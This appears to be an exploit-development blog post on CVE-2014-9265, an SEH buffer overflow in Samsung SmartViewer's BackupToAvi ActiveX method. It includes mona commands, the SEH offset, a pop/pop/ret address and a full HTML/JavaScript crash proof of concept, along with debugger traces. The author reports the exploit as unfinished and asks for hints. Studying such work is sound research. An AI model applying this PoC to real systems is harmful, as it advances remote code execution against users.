This blog post is about CVE-2014-9265.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
What Samsung says about the software
"SmartViewer is DVR management software that enables you to connect to and control a remote Samsung DVR on your PC via the network. With this tool, you can access Samsung DVRs anywhere around the world via the network, and check the video data from the connected cameras. You can also search for and play recording data in the DVR on a remote site, which will be an effective and convenient monitoring system."
Let's load the single vulnerable DLL, C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll, into Immunity Debugger.
The mona plugin's help can be viewed with the command below:
!mona
modules / mod | Show all loaded modules and their properties
unicodealign / ua | Generate venetian alignment code for unicode stack buffer overflow
The following command displays the list of all loaded modules and their properties (ASLR, SafeSEH, etc.):
!mona modules
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Module info :
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D 0x774d0000 | 0x7754b000 | 0x0007b000 | True | True | True | True | True | 6.1.7600.16385 [COMDLG32.dll] (C:\Windows\system32\COMDLG32.dll)
0BADF00D 0x10000000 | 0x1017b000 | 0x0017b000 | False | False | False | False | False | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
0BADF00D 0x75c60000 | 0x75d34000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
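As an added example (not code from the original post or from mona), a small Python parser for the !mona modules table above that flags every module lacking one of the listed mitigations; the three rows embedded below are the ones shown above. Missing Rebase/ASLR/SafeSEH on a vendor DLL is exactly the condition this post goes on to exploit, so this is the check a product team would want in its build pipeline.

```python
import re
from typing import Dict, List

# The three rows from the !mona modules output above (constructed sample input).
MONA_MODULES_OUTPUT = """\
0BADF00D 0x774d0000 | 0x7754b000 | 0x0007b000 | True | True | True | True | True | 6.1.7600.16385 [COMDLG32.dll] (C:\\Windows\\system32\\COMDLG32.dll)
0BADF00D 0x10000000 | 0x1017b000 | 0x0017b000 | False | False | False | False | False | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\\Program Files\\Samsung\\SmartViewer3.0\\Bin\\CNC_Ctrl_STW.dll)
0BADF00D 0x75c60000 | 0x75d34000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\\Windows\\system32\\kernel32.dll)
"""

# Columns: Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version [Name] (Path)
ROW_RE = re.compile(
    r"^0BADF00D\s+0x(?P<base>[0-9a-fA-F]+)\s*\|\s*0x(?P<top>[0-9a-fA-F]+)\s*\|\s*0x(?P<size>[0-9a-fA-F]+)\s*\|"
    r"\s*(?P<rebase>True|False)\s*\|\s*(?P<safeseh>True|False)\s*\|\s*(?P<aslr>True|False)\s*\|"
    r"\s*(?P<nx>True|False)\s*\|\s*(?P<osdll>True|False)\s*\|\s*(?P<version>\S+)\s*\[(?P<name>[^\]]+)\]"
)

def parse_mona_modules(text: str) -> List[Dict[str, object]]:
    """Parse the module rows; separator, header and 'Module info' lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        rows.append({
            "name": d["name"],
            "base": int(d["base"], 16),
            "rebase": d["rebase"] == "True",
            "safeseh": d["safeseh"] == "True",
            "aslr": d["aslr"] == "True",
            "nx": d["nx"] == "True",
            "os_dll": d["osdll"] == "True",
        })
    return rows

def unprotected_modules(rows: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Map module name -> mitigations it lacks. A module at a fixed base with no
    SafeSEH is what makes an SEH overwrite usable, so a vendor should rebuild such
    DLLs with /DYNAMICBASE, /SAFESEH and /NXCOMPAT."""
    findings = {}
    for r in rows:
        missing = [flag for flag in ("rebase", "safeseh", "aslr", "nx") if not r[flag]]
        if missing:
            findings[str(r["name"])] = missing
    return findings

if __name__ == "__main__":
    for name, missing in unprotected_modules(parse_mona_modules(MONA_MODULES_OUTPUT)).items():
        print(name + ": missing " + ", ".join(missing))
```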
!mona ua
The above command generates venetian_alignment.txt in C:\Program Files\Immunity Inc\Immunity Debugger\
The mona command to search for addresses of pop/pop/ret sequences:
!mona findwild -s "pop r32#*#pop r32#*#retn"
The above command writes its results to findwild.txt in C:\Program Files\Immunity Inc\Immunity Debugger\
Only one address (shown below) is Unicode-compatible and therefore useful to us.
0x10008700 : pop ecx # mov eax,esi # pop esi # retn 4 | null,unicodereverse {PAGE_EXECUTE_READ} [CNC_Ctrl_STW.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.6 (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
A conditional breakpoint can be set as follows, assuming EIP holds 0x10008700 (in practice EIP ends up holding 0x00100087, as discussed below):
bp 10008700 "j @eip=0x10008700 ; 'g' "
Finding offset to EIP
Initially, pass a character string of length 15000 to the BackupToAvi API and use a Metasploit cyclic pattern to find the offset at which EIP is overwritten; in my case it is offset 156. To find the offset, execute !exchain, then search for the characters located at address 0x045ad62c in the Metasploit cyclic pattern to get the offset.
Once we know the offsets to nSEH and SEH, we can write a PoC as shown below:
<html>
<head>
<title>PoC developed by Praveen Darshanam</title>
</head>
<body>
<h1>Samsung SmartViewer BackupToAvi Remote Code Execution</h1>
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target'>
</object>
<script>
var payload_length = 15000;
var arg1 = 1;
var arg2 = 1;
var arg3 = 1;
// blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
var i, j;
// offset to SEH is 156, from the initial analysis with a Metasploit cyclic pattern
for (i = 0; i < 156; i++)
{
buf1 += "A";
}
var nseh = "DD";
// address inside the vulnerable DLL (CNC_Ctrl_STW.dll)
var seh = "\x87\x10"; // 0x10008700: pop, pop, ret
junk = buf1 + nseh + seh;
// remaining buffer
for (j = 0; j < (payload_length - junk.length); j++)
{
buf2 += "B";
}
var fbuff = junk + buf2;
// the fourth argument is the oversized string passed to the control
target.BackupToAvi(arg1, arg2, arg3, fbuff);
</script>
</body>
</html>
When we open the above HTML file in the browser, we get the trace below (tested on Windows 7 Ultimate N SP1 using Internet Explorer 8):
(c6c.418): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00450045 edx=773771cd esi=00000000 edi=00000000
eip=00450045 esp=043b10a8 ebp=043b10c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
00450045 ?? ???
0:005> !exchain
....
045abacc: ntdll!ExecuteHandler2+3a (773771cd)
045abeb4: ntdll!ExecuteHandler2+3a (773771cd)
045ac29c: ntdll!ExecuteHandler2+3a (773771cd)
045ac684: ntdll!ExecuteHandler2+3a (773771cd)
045ad62c: 00450045
Invalid exception stack at 00440044
0:005> d 045ad62c
045ad62c 44 00 44 00 45 00 45 00-42 00 42 00 42 00 42 00 D.D.E.E.B.B.B.B.
045ad63c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad64c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad65c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad66c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad67c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad68c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad69c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
I couldn't write a working exploit because of the issues mentioned below.
Issue 1:
None of the registers point to the controlled buffer at the time of the crash; this can be verified using "d reg_name" on the WinDbg CLI, where reg_name is eax, ebx, esp, edi, etc.
var nseh = "DD";
var seh = "\x87\x10"; //0x10008700
045ad62c 44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.
Issue 2:
0x10008700 points to the pop/pop/ret sequence, but EIP receives 0x00100087 instead of 0x10008700.
I am facing issue 2 on Windows XP Pro SP3 as well:
0:008> !exchain
020bf798: 00100087
Invalid exception stack at 00440044
0:008> d 020bf798
020bf798 44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.
020bf7a8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7b8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7c8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7d8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7e8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7f8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf808 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
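As an added example (not code from the original post), a Python helper that reads the SEH record back out of the WinDbg dump above and shows that the handler value !exchain reports is simply the UTF-16LE (BSTR) form of the two-character seh string from the PoC; the two dump lines embedded below are copied from the output above. The same parser works on any `d` byte-dump output, which makes it handy when triaging crash reports.

```python
import struct
from typing import Tuple

# Two lines from the WinDbg "d 020bf798" output above (constructed sample input).
WINDBG_DUMP = """\
020bf798 44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.
020bf7a8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
"""

def parse_windbg_bytes(dump: str) -> Tuple[int, bytes]:
    """Parse `d` output lines of the form '<addr> 16 hex bytes (byte 8 joined to byte 9
    by '-') <ascii>' and return (address of the first line, raw bytes in memory order)."""
    start = None
    raw = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        if len(fields) < 16:
            continue                      # prompt, blank or truncated line
        addr = int(fields[0], 16)
        if start is None:
            start = addr
        hex_part = " ".join(fields[1:16]).replace("-", " ")   # 15 tokens, one is 'xx-xx'
        raw += bytes.fromhex(hex_part)
    return start, bytes(raw)

def seh_record(dump: str) -> dict:
    """Read the EXCEPTION_REGISTRATION_RECORD that !exchain listed at the dump start:
    a 'next' pointer followed by the handler pointer, both little-endian DWORDs."""
    addr, raw = parse_windbg_bytes(dump)
    nseh, handler = struct.unpack_from("<II", raw, 0)
    return {"record_addr": addr, "nseh": nseh, "handler": handler}

def utf16_expansion(js_string: str) -> bytes:
    """IE passes a script string to an ActiveX method as a BSTR, i.e. UTF-16LE,
    so each character of the JS string occupies two bytes with a 00 high byte."""
    return js_string.encode("utf-16-le")

if __name__ == "__main__":
    rec = seh_record(WINDBG_DUMP)
    print("nSEH = %08x, handler = %08x" % (rec["nseh"], rec["handler"]))
    # The handler DWORD is exactly the UTF-16LE form of the two-character seh string
    # from the PoC, which is why !exchain shows 00100087 rather than 10008700.
    expanded = int.from_bytes(utf16_expansion("\x87\x10"), "little")
    print("UTF-16LE('\\x87\\x10') as DWORD = %08x" % expanded)
```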
Any hints for developing a working exploit are most welcome!